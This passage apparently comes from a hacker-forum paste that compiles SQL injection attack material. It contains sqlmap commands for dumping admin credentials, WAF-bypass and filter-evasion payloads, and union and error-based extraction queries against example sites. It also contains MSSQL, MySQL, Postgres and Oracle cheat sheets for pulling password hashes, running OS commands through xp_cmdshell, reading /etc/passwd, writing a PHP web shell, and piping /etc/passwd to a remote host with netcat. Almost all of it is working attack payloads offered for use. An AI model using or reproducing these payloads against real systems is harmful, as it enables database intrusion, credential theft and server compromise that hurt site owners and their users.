  569.  
  570. - buang
  571.  
  572. ./sqlmap.py -u "http://www.target.com/login.php" --data = "id = admin & pwd = kata sandi & kirim = login" -D web_db -T tbl_admin -C pengguna, kata sandi --dump
  573.  
  574.  
  575. termasuk cookie
  576.  
  577.  
  578. masih metode yang sama tetapi Anda hanya harus memasukkan cookie
  579. ./sqlmap.py -u "http://www.target.com/index.php?id=2" --cookie = "PHPSESSID = 123asdqwe456blabla; user = admin"
  580. atau
  581. ./sqlmap.py -u "http://www.target.com/login.php" --data = "id = admin & pwd = kata sandi & kirim = masuk" --cookie = "PHPSESSID = 123asdqwe456blabla; user = admin"
  582.  
  583. parameter khusus
  584.  
  585.  
  586. jika Anda memiliki parameter khusus untuk menyuntikkan Anda dapat mengetik "-p" seperti perintah ini
  587. ./sqlmap.py -u "http://www.target.com/login.php" --data = "id = admin & pwd = kata sandi & kirim = masuk" --cookie = "PHPSESSID = 123asdqwe456blabla; user = admin" -p "pwd"
  588. sqlmap akan menyuntikkan parameter "pwd". atau Anda dapat memberi bintang "*" ke parameter untuk disuntikkan, seperti ini
  589. ./sqlmap.py -u "http://www.target.com/login.php" --data = "id = admin & pwd = * kata sandi & kirim = masuk" --cookie = "PHPSESSID = 123asdqwe456blabla; user = admin"
  590.  
  591. penutup
  592.  
  593.  
  594. jika Anda pengguna windows, jangan gunakan "./" untuk menjalankannya pada cmd.
  595.  
  596. Go To Download Software: http://sqlmap.org/
  597.  
  598. when you try to access server with your SQL WAF will stop you again. You might have more luck if WAF controls only GET requests and you inject with POST...
  599.  
  600. SQLi Waf Behaviours
  601.  
  602. union select 1,2,3,4-- - [<---WAF
  603.  
  604. /*!union*/ select 1,2,3,4-- - [<--- No WAF
  605.  
  606. /*!union*/ select 1,group_concat(),3,4-- - [<--NO -WAF
  607.  
  608. /*!union*/ select 1,group_concat(table_name),3,4-- - [<---WAF
  609.  
  610. /*!union*/ select 1,group_concat(/*!table_name*/),3,4-- - [<--- No WAF
  611.  
  612. /*!union*/ select 1,group_concat(/*!table_name*/),3,4 from -- - [<---No WAF
  613.  
  614. /*!union*/ select 1,group_concat(/*!table_name*/),3,4 from information_schema.tables-- - [<---No WAF
  615.  
  616. /*!union*/ select 1,group_concat(/*!table_name*/),3,4 from information_schema.tables where-- - [<---WAF
  617.  
  618. /*!union*/ select 1,group_concat(/*!table_name*/),3,4 from information_schema.tables /*!where*/-- - [<---No WAF
  619.  
  620. /*!union*/ select 1,group_concat(/*!table_name*/),3,4 from information_schema.tables /*!where*/ table_schema-- - [<---No WAF
  621.  
  622. /*!union*/ select 1,group_concat(/*!table_name*/),3,4 from information_schema.tables /*!where*/ table_schema=database()-- - [<---No WAF
  623.  
  624. ~asero
  625.  
  626. EXTRACTING USERNAME AND PASSWORD IN THE TABLE
  627.  
  628. QUERY :
  629.  
  630. (select (@x) from (select (@x:=0x00), (select (@x) from users where (@x) in (@x:=concat(@x,'<br>',username,' : ',password))))x)
  631.  
  632. Here are the three methods which i know and mostly use to bypass [,] COMMA
  633. 1) union select 1/*!,*/ 2/*!,*/3
  634. 2) union select 1,CHAR(44), 2,CHAR(44),3,char(44)
  635. 3)(select 1)a join (select 2)b join (select 3)c
  636. hOpe if you have concept of sql injection i don't think i have to give eXample
  637. But also leaving here one eXample
  638. www.vuln.com/events.php?id=-1 union select 1,2,3===>blockEd..
  639. now use
  640. Union select 1,CHAR(44), 2,CHAR(44),3,char(44)--
  641. ~h
  642.  
  643. Pengetahuan Sql Untuk pelajar :)
  644. -------------------------------------------------- ------
  645. ---> Apa itu Sql Injection
  646. -------------------------------------------------- -------
  647. Injeksi SQL adalah teknik di mana pengguna jahat dapat menyuntikkan perintah SQL ke dalam pernyataan SQL, melalui input halaman web.
  648. Perintah SQL yang disuntikkan dapat mengubah pernyataan SQL dan membahayakan keamanan aplikasi web. Dan Juga Hancurkan basis data colonthree Anda
  649. -------------------------------------------------- -------
  650. ---> Apa itu Information_schema?
  651. -------------------------------------------------- -------
  652. INFORMATION_SCHEMA adalah basis data informasi, tempat yang menyimpan informasi tentang semua basis data lain yang disimpan oleh server MySQL. Di dalam INFORMATION_SCHEMA ada beberapa tabel hanya-baca.
  653. Berikut ini adalah daftar masing-masing pandangan yang ada.
  654. INFORMATION_SCHEMA.CHECK_CONSTRAINTS
  655. INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE
  656. INFORMATION_SCHEMA.COLUMN_PRIVILEGES
  657. INFORMATION_SCHEMA.COLUMNS
  658. INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE
  659. INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE
  660. INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS
  661. INFORMATION_SCHEMA.DOMAINS
  662. INFORMATION_SCHEMA.KEY_COLUMN_USAGE
  663. INFORMATION_SCHEMA.PARAMETERS
  664. INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS
  665. INFORMATION_SCHEMA.ROUTINE_COLUMNS
  666. INFORMATION_SCHEMA.ROUTINES
  667. INFORMATION_SCHEMA.SCHEMATA
  668. INFORMATION_SCHEMA.TABLE_CONSTRAINTS
  669. INFORMATION_SCHEMA.TABLE_PRIVILEGES
  670. INFORMATION_SCHEMA.TABLES
  671. INFORMATION_SCHEMA.VIEW_COLUMN_USAGE
  672. INFORMATION_SCHEMA.VIEW_TABLE_USAGE
  673. INFORMATION_SCHEMA.VIEWS
  674. -------------------------------------------------- -----
  675. ---> Apa Nilai Null?
  676. -------------------------------------------------- -------
  677. NULL SQL adalah istilah yang digunakan untuk merepresentasikan nilai yang hilang. Nilai NULL dalam tabel adalah nilai dalam bidang yang tampaknya kosong.
  678. Bidang dengan nilai NULL adalah bidang tanpa nilai. Sangat penting untuk memahami bahwa nilai NULL berbeda dari nilai nol atau bidang yang berisi spasi.
  679. ---------------------------
  680.  
  681.  
  682. MSSQL INJECTION CHEAT SHEET
  683.  
  684. Version SELECT @@version
  685. Comments SELECT 1 — comment
  686. SELECT /*comment*/1
  687. Current User SELECT user_name();
  688. SELECT system_user;
  689. SELECT user;
  690. SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID
  691. List Users SELECT name FROM master..syslogins
  692. List Password Hashes SELECT name, password FROM master..sysxlogins — priv, mssql 2000;
  693. SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins — priv, mssql 2000. Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.
  694. SELECT name, password_hash FROM master.sys.sql_logins — priv, mssql 2005;
  695. SELECT name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins — priv, mssql 2005
  696. Password Cracker MSSQL 2000 and 2005 Hashes are both SHA1-based. phrasen|drescher can crack these.
  697. List Privileges – current privs on a particular object in 2005, 2008
  698. SELECT permission_name FROM master..fn_my_permissions(null, ‘DATABASE’); — current database
  699. SELECT permission_name FROM master..fn_my_permissions(null, ‘SERVER’); — current server
  700. SELECT permission_name FROM master..fn_my_permissions(‘master..syslogins’, ‘OBJECT’); –permissions on a table
  701. SELECT permission_name FROM master..fn_my_permissions(‘sa’, ‘USER’);
  702. –permissions on a user– current privs in 2005, 2008
  703. SELECT is_srvrolemember(‘sysadmin’);
  704. SELECT is_srvrolemember(‘dbcreator’);
  705. SELECT is_srvrolemember(‘bulkadmin’);
  706. SELECT is_srvrolemember(‘diskadmin’);
  707. SELECT is_srvrolemember(‘processadmin’);
  708. SELECT is_srvrolemember(‘serveradmin’);
  709. SELECT is_srvrolemember(‘setupadmin’);
  710. SELECT is_srvrolemember(‘securityadmin’);
  711. – who has a particular priv? 2005, 2008
  712. SELECT name FROM master..syslogins WHERE denylogin = 0;
  713. SELECT name FROM master..syslogins WHERE hasaccess = 1;
  714. SELECT name FROM master..syslogins WHERE isntname = 0;
  715. SELECT name FROM master..syslogins WHERE isntgroup = 0;
  716. SELECT name FROM master..syslogins WHERE sysadmin = 1;
  717. SELECT name FROM master..syslogins WHERE securityadmin = 1;
  718. SELECT name FROM master..syslogins WHERE serveradmin = 1;
  719. SELECT name FROM master..syslogins WHERE setupadmin = 1;
  720. SELECT name FROM master..syslogins WHERE processadmin = 1;
  721. SELECT name FROM master..syslogins WHERE diskadmin = 1;
  722. SELECT name FROM master..syslogins WHERE dbcreator = 1;
  723. SELECT name FROM master..syslogins WHERE bulkadmin = 1;
  724. List DBA Accounts SELECT is_srvrolemember(‘sysadmin’); — is your account a sysadmin? returns 1 for true, 0 for false, NULL for invalid role. Also try ‘bulkadmin’, ‘systemadmin’ and other values from the documentation
  725. SELECT is_srvrolemember(‘sysadmin’, ‘sa’); — is sa a sysadmin? return 1 for true, 0 for false, NULL for invalid role/username.
  726. SELECT name FROM master..syslogins WHERE sysadmin = ’1′ — tested on 2005
  727. Current Database SELECT DB_NAME()
  728. List Databases SELECT name FROM master..sysdatabases;
  729. SELECT DB_NAME(N); — for N = 0, 1, 2, …
  730. List Columns SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘mytable’); — for the current DB only
  731. SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable
  732. List Tables SELECT name FROM master..sysobjects WHERE xtype = ‘U’; — use xtype = ‘V’ for views
  733. SELECT name FROM someotherdb..sysobjects WHERE xtype = ‘U’;
  734. SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable
  735. Find Tables From Column Name – NB: This example works only for the current database. If you wan’t to search another db, you need to specify the db name (e.g. replace sysobject with mydb..sysobjects).
  736. SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = ‘U’ AND syscolumns.name LIKE ‘%PASSWORD%’ — this lists table, column for each column containing the word ‘password’
  737. Select Nth Row SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins ORDER BY name ASC) sq ORDER BY name DESC — gets 9th row
  738. Select Nth Char SELECT substring(‘abcd’, 3, 1) — returns c
  739. Bitwise AND SELECT 6 & 2 — returns 2
  740. SELECT 6 & 1 — returns 0
  741. ASCII Value -> Char SELECT char(0×41) — returns A
  742. Char -> ASCII Value SELECT ascii(‘A’) – returns 65
  743. Casting SELECT CAST(’1′ as int);
  744. SELECT CAST(1 as char)
  745. String Concatenation SELECT ‘A’ + ‘B’ – returns AB
  746. If Statement IF (1=1) SELECT 1 ELSE SELECT 2 — returns 1
  747. Case Statement SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END — returns 1
  748. Avoiding Quotes SELECT char(65)+char(66) — returns AB
  749. Time Delay WAITFOR DELAY ’0:0:5′ — pause for 5 seconds
  750. Make DNS Requests declare @host varchar(800); select @host = name FROM master..syslogins; exec(‘master..xp_getfiledetails ”\’ + @host + ‘c$boot.ini”’); — nonpriv, works on 2000declare @host varchar(800); select @host = name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) + ‘.2.pentestmonkey.net’ from sys.sql_logins; exec(‘xp_fileexist ”\’ + @host + ‘c$boot.ini”’); — priv, works on 2005– NB: Concatenation is not allowed in calls to these SPs, hence why we have to use @host. Messy but necessary.
  751. – Also check out theDNS tunnel feature of sqlninja
  752. Command Execution EXEC xp_cmdshell ‘net user’; — privOn MSSQL 2005 you may need to reactivate xp_cmdshell first as it’s disabled by default:
  753. EXEC sp_configure ‘show advanced options’, 1; — priv
  754. RECONFIGURE; — priv
  755. EXEC sp_configure ‘xp_cmdshell’, 1; — priv
  756. RECONFIGURE; — priv
  757. Local File Access CREATE TABLE mydata (line varchar(8000));
  758. BULK INSERT mydata FROM ‘c:boot.ini’;
  759. DROP TABLE mydata;
  760. Hostname, IP Address SELECT HOST_NAME()
  761. Create Users EXEC sp_addlogin ‘user’, ‘pass’; — priv
  762. Drop Users EXEC sp_droplogin ‘user’; — priv
  763. Make User DBA EXEC master.dbo.sp_addsrvrolemember ‘user’, ‘sysadmin; — priv
  764. Location of DB files EXEC sp_helpdb master; –location of master.mdf
  765. EXEC sp_helpdb pubs; –location of pubs.mdf
  766. Default/System Databases northwind
  767. model
  768. msdb
  769. pubs — not on sql server 2005
  770. tempdb
  771.  
  772. ------------------------------------
  773.  
  774. MYSQL INJECTION CHEAT SHEET
  775.  
  776. Version SELECT @@version
  777. Comments SELECT 1; #comment
  778. SELECT /*comment*/1;
  779. Current User SELECT user();
  780. SELECT system_user();
  781. List Users SELECT user FROM mysql.user; — priv
  782. List Password Hashes SELECT host, user, password FROM mysql.user; — priv
  783. Password Cracker John the Ripper will crack MySQL password hashes.
  784. List Privileges SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; — list user privsSELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; — priv, list user privsSELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; — list privs on databases (schemas)SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; — list privs on columns
  785. List DBA Accounts SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘SUPER’;SELECT host, user FROM mysql.user WHERE Super_priv = ‘Y’; # priv
  786. Current Database SELECT database()
  787. List Databases SELECT schema_name FROM information_schema.schemata; — for MySQL >= v5.0
  788. SELECT distinct(db) FROM mysql.db — priv
  789. List Columns SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
  790. List Tables SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
  791. Find Tables From Column Name SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = ‘username’; — find table which have a column called ‘username’
  792. Select Nth Row SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0
  793. SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered from 0
  794. Select Nth Char SELECT substr(‘abcd’, 3, 1); # returns c
  795. Bitwise AND SELECT 6 & 2; # returns 2
  796. SELECT 6 & 1; # returns 0
  797. ASCII Value -> Char SELECT char(65); # returns A
  798. Char -> ASCII Value SELECT ascii(‘A’); # returns 65
  799. Casting SELECT cast(’1′ AS unsigned integer);
  800. SELECT cast(’123′ AS char);
  801. String Concatenation SELECT CONCAT(‘A’,'B’); #returns AB
  802. SELECT CONCAT(‘A’,'B’,'C’); # returns ABC
  803. If Statement SELECT if(1=1,’foo’,'bar’); — returns ‘foo’
  804. Case Statement SELECT CASE WHEN (1=1) THEN ‘A’ ELSE ‘B’ END; # returns A
  805. Avoiding Quotes SELECT 0×414243; # returns ABC
  806. Time Delay SELECT BENCHMARK(1000000,MD5(‘A’));
  807. SELECT SLEEP(5); # >= 5.0.12
  808. Make DNS Requests Impossible?
  809. Command Execution If mysqld (<5.0) is running as root AND you compromise a DBA account you can execute OS commands by uploading a shared object file into /usr/lib (or similar). The .so file should contain a User Defined Function (UDF). raptor_udf.c explains exactly how you go about this. Remember to compile for the target architecture which may or may not be the same as your attack platform.
  810. Local File Access …’ UNION ALL SELECT LOAD_FILE(‘/etc/passwd’) — priv, can only read world-readable files.
  811. SELECT * FROM mytable INTO dumpfile ‘/tmp/somefile’; — priv, write to file system
  812. Hostname, IP Address SELECT @@hostname;
  813. Create Users CREATE USER test1 IDENTIFIED BY ‘pass1′; — priv
  814. Delete Users DROP USER test1; — priv
  815. Make User DBA GRANT ALL PRIVILEGES ON *.* TO test1@’%'; — priv
  816. Location of DB files SELECT @@datadir;
  817. Default/System Databases information_schema (>= mysql 5.0)
  818. mysql
  819.  
  820. ------------------------------------------
  821. Postgres SQL Injection Cheat Sheet
  822. Version SELECT version()
  823. Comments SELECT 1; –comment
  824. SELECT /*comment*/1;
  825. Current User SELECT user;
  826. SELECT current_user;
  827. SELECT session_user;
  828. SELECT usename FROM pg_user;
  829. SELECT getpgusername();
  830. List Users SELECT usename FROM pg_user
  831. List Password Hashes SELECT usename, passwd FROM pg_shadow — priv
  832. Password Cracker MDCrack can crack PostgreSQL’s MD5-based passwords.
  833. List Privileges SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user
  834. List DBA Accounts SELECT usename FROM pg_user WHERE usesuper IS TRUE
  835. Current Database SELECT current_database()
  836. List Databases SELECT datname FROM pg_database
  837. List Columns SELECT relname, A.attname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind=’r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE ‘public’)
  838. List Tables SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN (‘r’,”) AND n.nspname NOT IN (‘pg_catalog’, ‘pg_toast’) AND pg_catalog.pg_table_is_visible(c.oid)
  839. Find Tables From Column Name If you want to list all the table names that contain a column LIKE ‘%password%’:SELECT DISTINCT relname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind=’r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE ‘public’) AND attname LIKE ‘%password%’;
  840. Select Nth Row SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 0; — rows numbered from 0
  841. SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 1;
  842. Select Nth Char SELECT substr(‘abcd’, 3, 1); — returns c
  843. Bitwise AND SELECT 6 & 2; — returns 2
  844. SELECT 6 & 1; –returns 0
  845. ASCII Value -> Char SELECT chr(65);
  846. Char -> ASCII Value SELECT ascii(‘A’);
  847. Casting SELECT CAST(1 as varchar);
  848. SELECT CAST(’1′ as int);
  849. String Concatenation SELECT ‘A’ || ‘B’; — returnsAB
  850. If Statement IF statements only seem valid inside functions, so aren’t much use for SQL injection. See CASE statement instead.
  851. Case Statement SELECT CASE WHEN (1=1) THEN ‘A’ ELSE ‘B’ END; — returns A
  852. Avoiding Quotes SELECT CHR(65)||CHR(66); — returns AB
  853. Time Delay SELECT pg_sleep(10); — postgres 8.2+ only
  854. CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS ‘/lib/libc.so.6′, ‘sleep’ language ‘C’ STRICT; SELECT sleep(10); –priv, create your own sleep function. Taken from here .
  855. Make DNS Requests Generally not possible in postgres. However if contrib/dblinkis installed (it isn’t by default) it can be used to resolve hostnames (assuming you have DBA rights):
  856. SELECT * FROM dblink('host=put.your.hostname.here user=someuser dbname=somedb', 'SELECT version()') RETURNS (result TEXT);
  857. Alternatively, if you have DBA rights you could run an OS-level command (see below) to resolve hostnames, e.g. “ping pentestmonkey.net”.
  858. Command Execution CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS ‘/lib/libc.so.6′, ‘system’ LANGUAGE ‘C’ STRICT; — privSELECT system(‘cat /etc/passwd | nc 10.0.0.1 8080′); — priv, commands run as postgres/pgsql OS-level user
  859. Local File Access CREATE TABLE mydata(t text);
  860. COPY mydata FROM ‘/etc/passwd’; — priv, can read files which are readable by postgres OS-level user
  861. …’ UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 1; — get data back one row at a time
  862. …’ UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 2; — get data back one row at a time …
  863. DROP TABLE mytest mytest;Write to a file:
  864. CREATE TABLE mytable (mycol text);
  865. INSERT INTO mytable(mycol) VALUES (‘<? pasthru($_GET[cmd]); ?>’);
  866. COPY mytable (mycol) TO ‘/tmp/test.php’; –priv, write files as postgres OS-level user. Generally you won’t be able to write to the web root, but it’s always work a try.
  867. – priv user can also read/write files by mapping libc functions
  868. Hostname, IP Address SELECT inet_server_addr(); — returns db server IP address (or null if using local connection)
  869. SELECT inet_server_port(); — returns db server IP address (or null if using local connection)
  870. Create Users CREATE USER test1 PASSWORD ‘pass1′; — priv
  871. CREATE USER test1 PASSWORD ‘pass1′ CREATEUSER; — priv, grant some privs at the same time
  872. Drop Users DROP USER test1; — priv
  873. Make User DBA ALTER USER test1 CREATEUSER CREATEDB; — priv
  874. Location of DB files SELECT current_setting(‘data_directory’); — priv
  875. SELECT current_setting(‘hba_file’); — priv
  876. Default/System Databases template0
  877. template1
  878.  
  879. -----------------------------------------------
  880. ORACLE SQL INJECTION CHEAT SHEET
  881.  
  882. Version SELECT banner FROM v$version WHERE banner LIKE ‘Oracle%’;
  883. SELECT banner FROM v$version WHERE banner LIKE ‘TNS%’;
  884. SELECT version FROM v$instance;
  885. Comments SELECT 1 FROM dual — comment
  886. – NB: SELECT statements must have a FROM clause in Oracle so we have to use the dummy table name ‘dual’ when we’re not actually selecting from a table.
  887. Current User SELECT user FROM dual
  888. List Users SELECT username FROM all_users ORDER BY username;
  889. SELECT name FROM sys.user$; — priv
  890. List Password Hashes SELECT name, password, astatus FROM sys.user$ — priv, <= 10g. astatus tells you if acct is locked
  891. SELECT name,spare4 FROM sys.user$ — priv, 11g
  892. Password Cracker checkpwd will crack the DES-based hashes from Oracle 8, 9 and 10.
  893. List Privileges SELECT * FROM session_privs; — current privs
  894. SELECT * FROM dba_sys_privs WHERE grantee = ‘DBSNMP’; — priv, list a user’s privs
  895. SELECT grantee FROM dba_sys_privs WHERE privilege = ‘SELECT ANY DICTIONARY’; — priv, find users with a particular priv
  896. SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS;
  897. List DBA Accounts SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = ‘YES’; — priv, list DBAs, DBA roles
  898. Current Database SELECT global_name FROM global_name;
  899. SELECT name FROM v$database;
  900. SELECT instance_name FROM v$instance;
  901. SELECT SYS.DATABASE_NAME FROM DUAL;
  902. List Databases SELECT DISTINCT owner FROM all_tables; — list schemas (one per user)
  903. – Also query TNS listener for other databases. See tnscmd (services | status).
  904. List Columns SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’;
  905. SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’ and owner = ‘foo’;
  906. List Tables SELECT table_name FROM all_tables;
  907. SELECT owner, table_name FROM all_tables;
  908. Find Tables From Column Name SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE ‘%PASS%’; — NB: table names are upper case
  909. Select Nth Row SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; — gets 9th row (rows numbered from 1)
  910. Select Nth Char SELECT substr(‘abcd’, 3, 1) FROM dual; — gets 3rd character, ‘c’
  911. Bitwise AND SELECT bitand(6,2) FROM dual; — returns 2
  912. SELECT bitand(6,1) FROM dual; — returns0
  913. ASCII Value -> Char SELECT chr(65) FROM dual; — returns A
  914. Char -> ASCII Value SELECT ascii(‘A’) FROM dual; — returns 65
  915. Casting SELECT CAST(1 AS char) FROM dual;
  916. SELECT CAST(’1′ AS int) FROM dual;
  917. String Concatenation SELECT ‘A’ || ‘B’ FROM dual; — returns AB
  918. If Statement BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END; — doesn’t play well with SELECT statements
  919. Case Statement SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; — returns 1
  920. SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; — returns 2
  921. Avoiding Quotes SELECT chr(65) || chr(66) FROM dual; — returns AB
  922. Time Delay BEGIN DBMS_LOCK.SLEEP(5); END; — priv, can’t seem to embed this in a SELECT
  923. SELECT UTL_INADDR.get_host_name(’10.0.0.1′) FROM dual; — if reverse looks are slow
  924. SELECT UTL_INADDR.get_host_address(‘blah.attacker.com’) FROM dual; — if forward lookups are slow
  925. SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual; — if outbound TCP is filtered / slow
  926. – Also see Heavy Queries to create a time delay
  927. Make DNS Requests SELECT UTL_INADDR.get_host_address(‘google.com’) FROM dual;
  928. SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual;
  929. Command Execution Javacan be used to execute commands if it’s installed.ExtProc can sometimes be used too, though it normally failed for me. :-(
  930. Local File Access UTL_FILE can sometimes be used. Check that the following is non-null:
  931. SELECT value FROM v$parameter2 WHERE name = ‘utl_file_dir’;Java can be used to read and write files if it’s installed (it is not available in Oracle Express).
  932. Hostname, IP Address SELECT UTL_INADDR.get_host_name FROM dual;
  933. SELECT host_name FROM v$instance;
  934. SELECT UTL_INADDR.get_host_address FROM dual; — gets IP address
  935. SELECT UTL_INADDR.get_host_name(’10.0.0.1′) FROM dual; — gets hostnames
  936. Location of DB files SELECT name FROM V$DATAFILE;
  937. Default/System Databases SYSTEM
  938. SYSAUX
  939.  
  940. ~rkx
  941.  
  942. Basic filter
  943.  
  944. ----------------------------
  945.  
  946. *** Comments
  947.  
  948. ‘ or 1=1#
  949.  
  950. ‘ or 1=1– -
  951.  
  952. ‘ or 1=1/* (MySQL < 5.1)
  953.  
  954. ' or 1=1;%00
  955.  
  956. ' or 1=1 union select 1,2 as `
  957.  
  958. ' or#newline
  959.  
  960. 1='1
  961.  
  962. ' or– -newline
  963.  
  964. 1='1
  965.  
  966. ' /*!50000or*/1='1
  967.  
  968. ' /*!or*/1='1
  969.  
  970. *** Prefixes
  971.  
  972. + – ~ !
  973.  
  974. ‘ or –+2=- -!!!’2
  975.  
  976. *** Operators
  977.  
  978. ^, =, !=, %, /, *, &, &&, |, ||, , >>, <=, <=, ,, XOR, DIV, LIKE, SOUNDS LIKE,
  979.  
  980. RLIKE, REGEXP, LEAST, GREATEST, CAST, CONVERT, IS, IN, NOT, MATCH, AND, OR, BINARY, BETWEEN, ISNULL
  981.  
  982. *** Whitespaces
  983.  
  984. + %09 %0a %0b %0c %0d %a0 /**/
  985.  
  986. ‘or+(1)sounds/**/like“1“–%a0-
  987.  
  988. load_file/*foo*/(0×616263)
  989.  
  990. 0x82 ( low single comma )
  991.  
  992. %82
  993.  
  994. %uff00 %c0%20 %c0%a0 %e0%80%a0 %u0028 %uff08 %c0( %c0%a8 %e0%80%a8 %u0029 %uff09 %c0) %c0%a9 %e0%80%a9
  995.  
  996. -Ph.h4rh4r
  997.  
  998. FOR POSTGRE 8.4 >
  999.  
  1000. (select+array_to_string(array_agg(concat(table_name,'::',column_name)::text),$$%3Cli%3E$$)from+information_schema.columns+where+table_schema+not+in($$informatio​n_schema$$,$$pg_catalog$$))
  1001.  
  1002. 2.FOR POSTGRE 9.1>
  1003.  
  1004. (select+string_agg(concat(table_name,'::',column_name),$$%3Cli%3E$$)from+informa​tion_schema.columns+where+table_schema+not+in($$information_schema$$,$$pg_catalo​g$$))
  1005.  
  1006. 3. ALL VERSION
  1007. (select+array_to_string(array(select+table_name||':::'||column_name::text+from+i​nformation_schema.columns+where+table_schema+not+in($$information_schema$$,$$pg_catalog$$)),'%3Cli%3E'))
  1008.  
  1009. 4.
  1010. 'Asero ::: '||version()||'<br>'||(SELECT array_to_string(array(SELECT('===>'||T0ltable_name||' :: '||column_name)::text FROM information_schema.columns where table_schema='public'),'<br>'))
  1011.  
  1012. ~Asero
  1013.  
  1014.  
  1015. Oracle SQL Injection and DIOS query (Ph.h4rh4r)
  1016.  
  1017. http://www.site.it/pages.php?p=cut-linear') order by 3--&lang=it
  1018.  
  1019. No Error
  1020.  
  1021. http://www.site.it/pages.php?p=cut-linear') order by 4--&lang=it
  1022.  
  1023. No Error
  1024.  
  1025. http://www.site.it/pages.php?p=cut-linear') order by 5--&lang=it
  1026.  
  1027. Error
  1028.  
  1029. http://www.site.it/pages.php?p=cut-linear') Union All Select NULL,NULL,NULL,NULL from dual--&lang=it
  1030.  
  1031. ctrl+u (view-source:)
  1032.  
  1033. view-source:http://www.site.it/pages.php?p=cut-linear') Union All Select '1111',NULL,NULL,NULL from dual--&lang=it
  1034.  
  1035. view-source:http://www.site.it/pages.php?p=cut-linear') Union All Select NULL,'1111',NULL,NULL from dual--&lang=it
  1036.  
  1037. view-source:}
  1038.  
  1039. <meta name="description" content="11111" />
  1040.  
  1041. <meta name="description" content="1" />
  1042.  
  1043. }
  1044.  
  1045. '">'||(select LISTAGG(table_name,'<li>') within group (ORDER BY table_name) from all_tables)||'<!--'
  1046.  
  1047. (select wm_concat('<li>'||table_name||':'||column_name)from (select rownum as rnum,table_name,column_name from all_tab_columns order by table_name desc) shell where rnum<120)||'<!--'
  1048.  
  1049. http://www.site.it/pages.php?p=cut-linear') and 1=0 union select null,'">'||(select LISTAGG(table_name,'<li>') within group (ORDER BY table_name) from all_tables)||'<!--' ,NULL,NULL from dual --&lang=it
  1050.  
  1051. (select banner from v$version where rownum=1)
  1052.  
  1053.  
  1054. SQL injection using the xml function extractvalue() to extract data (Ph.h4rh4r)
  1055.  
  1056. 1 : www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,version(),0x3a,user()))--
  1057.  
  1058. Result:
  1059.  
  1060. 'Xpath syntax error: 5.5.9:user@localhost'
  1061.  
  1062. 2 : www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3c,table_name) from information_schema.tables limit 85,1)))--
  1063.  
  1064. Result:
  1065.  
  1066. 'Xpath syntax error: :users'
  1067.  
